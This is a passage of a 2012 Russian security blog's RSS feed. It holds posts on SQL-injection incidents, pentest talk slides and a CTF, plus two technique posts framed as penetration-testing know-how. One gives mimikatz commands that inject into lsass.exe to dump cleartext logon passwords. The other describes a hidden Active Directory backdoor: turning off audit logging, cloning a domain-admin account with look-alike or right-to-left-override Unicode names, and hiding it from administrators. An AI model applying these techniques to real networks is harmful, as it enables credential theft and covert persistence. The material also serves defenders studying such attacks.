Evteev)</itunes:author><itunes:summary>Что-то давно я не писал про SQL-инъекции и инциденты, связанные с ними. И потому не смог отказать себе в удовольствии посмаковать последние события, опубликованные на news.softpedia.com. Шутка ли, что хакер под псевдонимом D35m0nd142, вооружившись последней версией Acunetix WVS и средством для автоматизации проведения атаки через blind SQLi (Havij?) сумел натворить много дел [1] на столь известных ресурсах, как например Oracle.com и Skype.com: Вот такая она информационная защищенность безопасность столь интересных ресурсов. На фоне этого инцидента вспоминается разбор полетов Anonymous, опубликованный на днях компанией Imperva [2]. Слишком уж он напоминает сценарий нашего героя. С другой стороны, "атаки, они такие атаки"...</itunes:summary><itunes:keywords>инциденты, взлом, hackers, web security</itunes:keywords></item><item><title>(0day) Пароли в открытом виде или секреты LSA</title><link>http://devteev.blogspot.com/2012/02/0day-lsa.html</link><category>Microsoft</category><category>0day</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Mon, 20 Feb 2012 11:34:23 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-2928456619646146482</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-108SQICGDe0/T0Kf6jc5WpI/AAAAAAAABZI/daRcIovZ-BY/s1600/l.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="132" src="http://3.bp.blogspot.com/-108SQICGDe0/T0Kf6jc5WpI/AAAAAAAABZI/daRcIovZ-BY/s200/l.png" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;Не успел я сконсолидировать типовые методы пост-эксплуатации на платформе Windows в &lt;a href="http://devteev.blogspot.com/2012/02/drg-8-microsoft.html"&gt;предыдущем посте&lt;/a&gt;, как (неожиданно и в тот же день) &lt;a href="https://twitter.com/#!/arbitrarycode/status/170596131066220544"&gt;Александр Зайцев&lt;/a&gt; нарыл в сети новую, куда более интересную тему. Речь идет про опубликованный на днях французским исследователем "швейцарский нож" под названием &lt;a href="http://blog.gentilkiwi.com/mimikatz"&gt;mimikatz&lt;/a&gt;. Инструмент, помимо аналогичного функционала, поддерживаемого &lt;a href="http://www.ampliasecurity.com/research.html"&gt;Windows Credentials Editor&lt;/a&gt;, &lt;b&gt;позволяет выдергивать креды залогиневшегося пользователя в системе открытым текстом&lt;/b&gt;! Атака реализуется следующей магией:&lt;br /&gt;
&lt;br /&gt;
&lt;blockquote&gt;mimikatz # privilege::debug&lt;br /&gt;
mimikatz # inject::process lsass.exe sekurlsa.dll&lt;br /&gt;
mimikatz # @getLogonPasswords&lt;/blockquote&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-k4LV7o85Y18/T0KblvYjh3I/AAAAAAAABZA/pGacF9GJ_24/s1600/mimikatz.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="271" src="http://1.bp.blogspot.com/-k4LV7o85Y18/T0KblvYjh3I/AAAAAAAABZA/pGacF9GJ_24/s400/mimikatz.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
Подобное чудо связано с использованием поставщика безопасности &lt;a href="http://blog.gentilkiwi.com/mimikatz/sekurlsa/wdigest"&gt;wdigest&lt;/a&gt;, который с целью поддержки SSO хранит пароль в памяти открытым текстом (кто бы мог подумать!). Стоит ли говорить какой выхлоп для атакующего играет подобный недостаток :) К слову, парни уже прикручивают это чудо к &lt;a href="http://www.metasploit.com/"&gt;MSF&lt;/a&gt; - &lt;a href="http://pauldotcom.com/2012/02/dumping-cleartext-credentials.html"&gt;http://pauldotcom.com/2012/02/dumping-cleartext-credentials.html&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
В качестве временного решения можно отключить поставщика безопасности wdigest через соответствующую ветвь реестра (HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa). Однако стоит понимать, что атакующий может проделать тоже самое в обратном порядке.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1151777387719242828-2928456619646146482?l=devteev.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2012-02-20T23:34:23.219+04:00</app:edited><media:thumbnail url="http://3.bp.blogspot.com/-108SQICGDe0/T0Kf6jc5WpI/AAAAAAAABZI/daRcIovZ-BY/s72-c/l.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">20</thr:total></item><item><title>DRG 8: Тестирование на проникновение в сетях Microsoft</title><link>http://devteev.blogspot.com/2012/02/drg-8-microsoft.html</link><category>мероприятия</category><category>pentest</category><category>тест на проникновение</category><category>выступления</category><category>Microsoft</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Thu, 16 Feb 2012 08:02:03 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-4454184566522761604</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;Презентация с сегодняшней встречи на &lt;a href="https://www.defcon-russia.ru/8.php"&gt;Defcon Russia Group 8&lt;/a&gt; -&lt;br /&gt;
&lt;center&gt;&lt;br /&gt;
&lt;div id="__ss_11616760" style="width: 425px;"&gt;&lt;strong style="display: block; margin: 12px 0 4px;"&gt;&lt;a href="http://www.slideshare.net/devteev/microsoft-11616760" target="_blank" title="Тестирование на проникновение в сетях Microsoft"&gt;Тестирование на проникновение в сетях Microsoft&lt;/a&gt;&lt;/strong&gt; &lt;iframe frameborder="0" height="355" marginheight="0" marginwidth="0" scrolling="no" src="http://www.slideshare.net/slideshow/embed_code/11616760" width="425"&gt;&lt;/iframe&gt; &lt;br /&gt;
&lt;div style="padding: 5px 0 12px;"&gt;View more &lt;a href="http://www.slideshare.net/thecroaker/death-by-powerpoint" target="_blank"&gt;PowerPoint&lt;/a&gt; from &lt;a href="http://www.slideshare.net/devteev" target="_blank"&gt;Dmitry Evteev&lt;/a&gt; &lt;/div&gt;&lt;/div&gt;&lt;/center&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1151777387719242828-4454184566522761604?l=devteev.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2012-02-16T20:02:03.034+04:00</app:edited><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">4</thr:total></item><item><title>PHDays CTF 2011 Quals/Afterparty: как это было</title><link>http://devteev.blogspot.com/2012/02/phdays-ctf-2011-qualsafterparty.html</link><category>CTF</category><category>вебинары</category><category>phdays</category><category>positive technologies</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Thu, 16 Feb 2012 08:06:56 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-7424691834793753572</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;Презентация с сегодняшнего &lt;a href="http://www.ptsecurity.ru/webinars.asp"&gt;вебинара&lt;/a&gt; представлена ниже.&lt;br /&gt;
&lt;center&gt;&lt;br /&gt;
&lt;div id="__ss_11609900" style="width: 425px;"&gt;&lt;strong style="display: block; margin: 12px 0 4px;"&gt;&lt;a href="http://www.slideshare.net/devteev/phdays-ctf-2011-qualsafterparty" target="_blank" title="PHDays CTF 2011 Quals/Afterparty: как это было"&gt;PHDays CTF 2011 Quals/Afterparty: как это было&lt;/a&gt;&lt;/strong&gt; &lt;iframe frameborder="0" height="355" marginheight="0" marginwidth="0" scrolling="no" src="http://www.slideshare.net/slideshow/embed_code/11609900" width="425"&gt;&lt;/iframe&gt; &lt;br /&gt;
&lt;div style="padding: 5px 0 12px;"&gt;View more &lt;a href="http://www.slideshare.net/thecroaker/death-by-powerpoint" target="_blank"&gt;PowerPoint&lt;/a&gt; from &lt;a href="http://www.slideshare.net/devteev" target="_blank"&gt;Dmitry Evteev&lt;/a&gt; &lt;/div&gt;&lt;/div&gt;&lt;/center&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
Обещанный образ виртуальной машины и все необходимые материалы доступны для скачивания по следующим ссылкам:&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://phdays.ru/files/PHD-HQ2011.part1.rar"&gt;http://phdays.ru/files/PHD-HQ2011.part1.rar&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://phdays.ru/files/PHD-HQ2011.part2.rar"&gt;http://phdays.ru/files/PHD-HQ2011.part2.rar&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://phdays.ru/files/PHD-HQ2011-additionally.ZIP"&gt;http://phdays.ru/files/PHD-HQ2011-additionally.ZIP&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Контрольные суммы:&lt;br /&gt;
&lt;br /&gt;
6aa574211826ad4f4fa518769a067ed6 *PHD-HQ2011.part1.rar&lt;br /&gt;
27b3845d190ea5dabe371d8f1c5ab75d *PHD-HQ2011.part2.rar&lt;br /&gt;
2ecf9408e864ff90820cd7ab8390559c *PHD-HQ2011-additionally.ZIP&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1151777387719242828-7424691834793753572?l=devteev.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2012-02-16T20:06:56.484+04:00</app:edited><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><enclosure url="http://phdays.ru/files/PHD-HQ2011.part1.rar" length="-1" type="application/octet-stream" /><media:content url="http://phdays.ru/files/PHD-HQ2011.part1.rar" type="application/octet-stream" /><itunes:explicit>no</itunes:explicit><itunes:subtitle>Презентация с сегодняшнего вебинара представлена ниже. PHDays CTF 2011 Quals/Afterparty: как это было View more PowerPoint from Dmitry Evteev Обещанный образ виртуальной машины и все необходимые материалы доступны для скачивания по следующим ссылкам: http</itunes:subtitle><itunes:author>noreply@blogger.com (Dmitry Evteev)</itunes:author><itunes:summary>Презентация с сегодняшнего вебинара представлена ниже. PHDays CTF 2011 Quals/Afterparty: как это было View more PowerPoint from Dmitry Evteev Обещанный образ виртуальной машины и все необходимые материалы доступны для скачивания по следующим ссылкам: http://phdays.ru/files/PHD-HQ2011.part1.rar http://phdays.ru/files/PHD-HQ2011.part2.rar http://phdays.ru/files/PHD-HQ2011-additionally.ZIP Контрольные суммы: 6aa574211826ad4f4fa518769a067ed6 *PHD-HQ2011.part1.rar 27b3845d190ea5dabe371d8f1c5ab75d *PHD-HQ2011.part2.rar 2ecf9408e864ff90820cd7ab8390559c *PHD-HQ2011-additionally.ZIP </itunes:summary><itunes:keywords>CTF, вебинары, phdays, positive technologies</itunes:keywords></item><item><title>Инфофорум 2012: материалы мастер-класса</title><link>http://devteev.blogspot.com/2012/02/2012.html</link><category>уязвимости</category><category>pentest</category><category>тест на проникновение</category><category>security</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Tue, 07 Feb 2012 04:02:27 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-7176477531527850625</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;Провел сегодня мастер-класс на &lt;a href="http://infoforum.ru/2012/program"&gt;Инфофоруме 2012&lt;/a&gt; (да да, прям в здании &lt;a href="http://infoforum.ru/2012/skhema-proezda"&gt;Правительства РФ&lt;/a&gt;)). Рассказывал "сказки", показывал мультики :)&lt;br /&gt;
&lt;center&gt;&lt;br /&gt;
&lt;div id="__ss_11461225" style="width: 425px;"&gt;&lt;strong style="display: block; margin: 12px 0 4px;"&gt;&lt;a href="http://www.slideshare.net/devteev/ss-11461225" target="_blank" title="Как взламывают сети государственных учреждений"&gt;Как взламывают сети государственных учреждений&lt;/a&gt;&lt;/strong&gt; &lt;iframe frameborder="0" height="355" marginheight="0" marginwidth="0" scrolling="no" src="http://www.slideshare.net/slideshow/embed_code/11461225" width="425"&gt;&lt;/iframe&gt; &lt;br /&gt;
&lt;div style="padding: 5px 0 12px;"&gt;View more &lt;a href="http://www.slideshare.net/thecroaker/death-by-powerpoint" target="_blank"&gt;PowerPoint&lt;/a&gt; from &lt;a href="http://www.slideshare.net/devteev" target="_blank"&gt;Dmitry Evteev&lt;/a&gt; &lt;/div&gt;&lt;/div&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;iframe src="http://player.vimeo.com/video/36338828?title=0&amp;amp;byline=0&amp;amp;portrait=0" width="400" height="225" frameborder="0" webkitAllowFullScreen mozallowfullscreen allowFullScreen&gt;&lt;/iframe&gt;&lt;br /&gt;
&lt;/center&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1151777387719242828-7176477531527850625?l=devteev.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2012-02-07T16:02:27.615+04:00</app:edited><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">13</thr:total></item><item><title>Доигрался или звезда в шоке)</title><link>http://devteev.blogspot.com/2012/01/blog-post_27.html</link><category>юмор</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Fri, 27 Jan 2012 01:11:19 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-2664344707078744066</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;b&gt;NO COMMENTS ^_^&lt;/b&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-9Qt_JeeCT9Y/TyJqDwNYaaI/AAAAAAAABY0/Zun5uxZVVR0/s1600/read-only.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="218" src="http://4.bp.blogspot.com/-9Qt_JeeCT9Y/TyJqDwNYaaI/AAAAAAAABY0/Zun5uxZVVR0/s640/read-only.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1151777387719242828-2664344707078744066?l=devteev.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2012-01-27T13:11:19.074+04:00</app:edited><media:thumbnail url="http://4.bp.blogspot.com/-9Qt_JeeCT9Y/TyJqDwNYaaI/AAAAAAAABY0/Zun5uxZVVR0/s72-c/read-only.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">8</thr:total></item><item><title>Вебинары Positive Technologies</title><link>http://devteev.blogspot.com/2012/01/positive-technologies.html</link><category>вебинары</category><category>positive technologies</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Thu, 26 Jan 2012 15:33:26 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-76874915018266628</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div&gt;&lt;a href="http://4.bp.blogspot.com/-8snQUhmqg5E/TyHdzM8jr6I/AAAAAAAABYs/QiPgFB8ldsU/s1600/logo.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/-8snQUhmqg5E/TyHdzM8jr6I/AAAAAAAABYs/QiPgFB8ldsU/s1600/logo.png" /&gt;&lt;/a&gt;Опубликовано расписание образовательной программы "&lt;a href="http://www.ptsecurity.ru/webinars.asp"&gt;Практическая безопасность&lt;/a&gt;"&amp;nbsp;на первое полугодие 2012 года. Стоит отметить, что запланированный список тем не является окончательным и со временем будет пополняться. Разумеется, все самые "вкусные" темы припасены на международный форум &lt;a href="http://phdays.ru/"&gt;Positive Hack Days&lt;/a&gt; :)&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;А пока счет 7/4 и&amp;nbsp;&lt;a href="http://www.ptsecurity.ru/maxpatrol.asp"&gt;MaxPatrol&lt;/a&gt;&amp;nbsp;заметно&amp;nbsp;лидирует))&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1151777387719242828-76874915018266628?l=devteev.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2012-01-27T03:33:26.438+04:00</app:edited><media:thumbnail url="http://4.bp.blogspot.com/-8snQUhmqg5E/TyHdzM8jr6I/AAAAAAAABYs/QiPgFB8ldsU/s72-c/logo.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total></item><item><title>Как MaxPatrol ищет 0day?</title><link>http://devteev.blogspot.com/2012/01/maxpatrol-0day_25.html</link><category>positive technologies</category><category>maxpatrol</category><category>0day</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Wed, 25 Jan 2012 07:47:09 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-4836334327006005450</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;Легко! :)&amp;nbsp;&lt;a href="http://www.zerodayinitiative.com/advisories/ZDI-12-015/"&gt;http://www.zerodayinitiative.com/advisories/ZDI-12-015/&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-sK8eoaFnCUA/TyAj1YJtbXI/AAAAAAAABYk/AVZFhV4RgxY/s1600/zdi.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="408" src="http://2.bp.blogspot.com/-sK8eoaFnCUA/TyAj1YJtbXI/AAAAAAAABYk/AVZFhV4RgxY/s640/zdi.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div class="MsoNormal"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1151777387719242828-4836334327006005450?l=devteev.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2012-01-25T19:47:09.562+04:00</app:edited><media:thumbnail url="http://2.bp.blogspot.com/-sK8eoaFnCUA/TyAj1YJtbXI/AAAAAAAABYk/AVZFhV4RgxY/s72-c/zdi.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">6</thr:total></item><item><title>Backdoor в Active Directory следующего поколения</title><link>http://devteev.blogspot.com/2012/01/backdoor-active-directory.html</link><category>pentest</category><category>тест на проникновение</category><category>security</category><category>Microsoft</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Tue, 10 Jan 2012 00:33:33 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-6374246124939846207</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;В начале прошлого года мною уже &lt;a href="http://devteev.blogspot.com/2011/02/backdoor-active-directory.html"&gt;поднималась&lt;/a&gt; тема пост-эксплуатации в домене Microsoft Active Directory. В предложенном &lt;a href="http://devteev.blogspot.com/2011/02/backdoor-active-directory.html"&gt;ранее подходе&lt;/a&gt; рассматривался вариант ориентированный больше на случай утери административных привилегий, нежели их непосредственное использование. При этом само действо по возврату этих привилегий подразумевало "шумные" события и визуально палевные манипуляции в каталоге. Другими словами, для того, чтобы вернуть себе административные привилегии в домене, требовалось стать участником соответствующей группы безопасности, например, группы "Domain Admins".&lt;br /&gt;
&lt;br /&gt;
Надо сказать, что администраторы очень волнуются, когда неожиданно осознают присутствие в своей системе кого-то еще. Некоторые из них бросаются всеми силами обрабатывать инцидент безопасности. Порой, самыми непредсказуемыми действиями ;))&lt;br /&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-4LyGFN-AeIA/TwsZv1PCt1I/AAAAAAAABXs/KOMhfG3zgBQ/s1600/m1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="444" src="http://2.bp.blogspot.com/-4LyGFN-AeIA/TwsZv1PCt1I/AAAAAAAABXs/KOMhfG3zgBQ/s640/m1.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
Теперь представьте, как себя может повести администратор Active Directory в крупной компании, при виде незнакомого идентификатора в группе безопасности "Enterprise Admins"? В случае если кто-то залился не понарошку, тогда озабоченность администратора полностью оправдана. Но в случае недостаточного противодействия при проведении пентеста, шибко волноваться явно не стоит (ровно, как лишать парней точек входа и добытых потом и кровью привилегий).&lt;br /&gt;
&lt;br /&gt;
Я долго размышлял над тем, как, не пугая администраторов, свободно пользоваться достигнутыми привилегиями в ходе проведения тестирования на проникновение (особенно на фоне агрессивного противодействия со стороны администраторов на последних работах). С одной стороны, при проведении пентеста мы сильно ограничены в возможностях. Например, правило по минимизации воздействия на объект исследования – это как само собой разумеющееся. Поэтому наплодить и раскидать бэкдоров по захваченной сети мы попросту не можем. С другой стороны, есть совершенно понятные цели, к которым требуется прийти до того момента, как радостный администратор заметит несанкционированную активность и выдернет шнур из розетки.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Так как же можно оставаться незамеченным в сетях Microsoft?&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Первое, что приходит в голову - использовать учетную запись администратора. Доступ легитимный, поэтому он не должен привлекать к себе особое внимание. Но, как показывает практика, не всегда удается получить пароль администратора в открытом виде. В этих случаях на помощь спешит атака, известная под названием &lt;a href="http://oss.coresecurity.com/pshtoolkit/doc/index.html"&gt;Pass-the-Hash&lt;/a&gt;. Было бы почти все замечательно (почти, потому как Pass-the-Hash сужает возможности по развитию атаки, например, нельзя воспользоваться протоколом удаленного управления RDP), но в серьезных компаниях администраторы потихоньку переходят на смарт-карты, что не позволяет использовать атаки, основанные на недостатках протокола NTLM. Хорошо, но есть же еще возможность использования токена авторизованного пользователя (eq &lt;a href="http://www.offensive-security.com/metasploit-unleashed/Fun_With_Incognito"&gt;incognito&lt;/a&gt;) и/или билета Kerberos (eq &lt;a href="http://www.ampliasecurity.com/research/wcefaq.html"&gt;WCE&lt;/a&gt;). Так-то оно конечно так, но на практике Kerberos не керберос и токен не токен:( Доступный инструментарий по проведению данных видов атак, к сожалению, откровенно лажает. Кроме того, в обоих случаях, ровно как с атакой Pass-the-Hash, действия атакующего весьма ограничены используемыми протоколами, поддерживающими SSO в домене.&lt;br /&gt;
&lt;br /&gt;
Таким образом, самый привлекательный путь - это использование привилегий, если уж не существующего, так созданного идентификатора администратора домена с известным паролем...&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Как при этом не нарваться на бдительный глаз администратора домена?&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Во-первых, внесение изменений в каталог Active Directory порождает соответствующие события, о которых администратору лучше не знать. Поэтому перед заливкой в домен (разумеется, только при проведении тестирования на проникновение и после согласования сего действа с ответственным лицом на стороне заказчика) рекомендуется отключить ведение событий безопасности на контролерах домена посредством соответствующего GPO. Напомню, что по умолчанию время фонового обновления групповых политик для контроллеров домена составляет 15 минут.&lt;br /&gt;
&lt;br /&gt;
Во-вторых, никто не мешает создать визуально идентичную учетную запись, аналогичную существующему администратору домена. Для этого, например, могут использоваться символы юникода (!). Далее, созданному пользователю выставляется атрибут "showInAdvancedViewOnly" в значение "TRUE", что позволит скрыть объект в стандартном режиме просмотра оснастки "Управления пользователями и компьютерами" (dsa.msc). После чего, осталось поместить этого пользователя в одну из административных групп, свободную от реального администратора домена (прим., как правило, администраторы любят воткнуть свою учетную запись во все мыслимые и не мыслимые административные группы; например, оставим администратора в группе "Enterprise Admins", а клона поместим в группу "Domain Admins").&lt;br /&gt;
&lt;br /&gt;
Но я думаю, что многие из читателей уже засомневалась в успехе компании. И они правы! Этот способ никуда не годится, т.к. в нем присутствуют два существенных недостатка:&lt;br /&gt;
1. Созданный идентификатор пользователя виден в каталоге "вооруженным глазом".&lt;br /&gt;
2. При поиске пользователей в домене, учетная запись администратора начинает двоиться.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Как можно решить эти проблемы?&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Казалось бы, самое простое решение на поверхности – правильно настроить права доступа к создаваемому объекту (нашему пользователю). Для этого достаточно группе "Everyone" запретить читать публичную информацию у объекта. И в организационной единице, рядом с реальным администратором Active Directory повиснет "нечто", что как минимум перестанет светиться при поиске пользователей в домене. Однако сказка продлится не более, чем 60 минут:( Дело в том, что по умолчанию каждые 60 минут на контроллере домена, выполняющего роль эмулятора PDC, запускается процесс "SDPROP", который восстанавливает права доступа у ряда объектов Active Directory (в том числе, у всех членов групп администраторов) в соответствии с установленными правами доступа на объект "AdminSDHolder" (&lt;a href="http://technet.microsoft.com/en-us/query/ee361593"&gt;http://technet.microsoft.com/en-us/query/ee361593&lt;/a&gt;).&lt;br /&gt;
&lt;br /&gt;
К сожалению, отключить указанный механизм безопасности штатными возможностями невозможно. Хак с правами доступа на объект может привести к проблемам с репликацией (а тут уже попахивает какой-то диверсией; при пентесте низя). Перезапись прав доступа на "AdminSDHolder" затронет множество объектов, включая идентификаторы всех администраторов домена. Таким образом, одним из возможных полезных решений, может быть регулярный запуск сценария, который будет исправлять погрешности процесса "SDPROP", но есть и более перспективная альтернатива.&lt;br /&gt;
&lt;br /&gt;
Процесс "SDPROP" восстанавливает права доступа (ACE) только на конкретные привилегированные объекты, при этом права доступа для организационных единиц, в которых содержатся подобные объекты, остаются неизменными. Этим-то как раз и можно воспользоваться! Нам ведь никто не мешает, используя символы юникода, создать аналогичную последовательность организационных единиц, аналогично той последовательности, в которой содержится клонируемый идентификатор. При этом, "правильные" права доступа на вышестоящий контейнер позволят его визуально скрыть от посторонних глаз (разумеется в пределах разумного).&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-Zpd-XokjjuM/TwsZ7_GBlKI/AAAAAAAABX0/kvHLO6JzcAs/s1600/m2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="372" src="http://2.bp.blogspot.com/-Zpd-XokjjuM/TwsZ7_GBlKI/AAAAAAAABX0/kvHLO6JzcAs/s640/m2.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-ezlQ9LalAF8/TwsZ_-LviII/AAAAAAAABX8/4m62h8j9aGc/s1600/m3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="366" src="http://3.bp.blogspot.com/-ezlQ9LalAF8/TwsZ_-LviII/AAAAAAAABX8/4m62h8j9aGc/s640/m3.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
Смысл подобного подхода заключается в том, что у администратора Active Directory не должны появиться нездоровые подозрения на тему того, что доверенная ему система была скомпрометирована. Он по-прежнему остается действующим администратором, разве что членом одной из привилегированных групп является визуально идентичная учетная запись...&lt;br /&gt;
&lt;br /&gt;
И последнее. Для того чтобы созданный клон не дублировался в поиске по каталогу можно воспользоваться, например, символом "&lt;a href="http://www.fileformat.info/info/unicode/char/202e/index.htm"&gt;202E&lt;/a&gt;" (респект &lt;a href="https://twitter.com/#!/arbitrarycode"&gt;Александру Зайцеву&lt;/a&gt; за напоминалку). Указанный символ переворачивает строку, расположенную за ним. Таким образом, если мы, к примеру, создаем клон для идентификатора "dmitry.ivanov", создаваемый идентификатор будет иметь вид "202E"+"vonavi.yrtimd". Возможно, такой подход не так удобен для прохождения аутентификации, но от попадания в поиск по каталогу спасает.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-XhcLFt90iGk/TwsaE7ZCMJI/AAAAAAAABYE/GWNN3ESzMS8/s1600/m4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="324" src="http://2.bp.blogspot.com/-XhcLFt90iGk/TwsaE7ZCMJI/AAAAAAAABYE/GWNN3ESzMS8/s640/m4.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
С точки зрения журналов безопасности, рассматриваемый подход также позволяет оставаться незамеченным до определенного момента.&lt;br /&gt;
&lt;br /&gt;
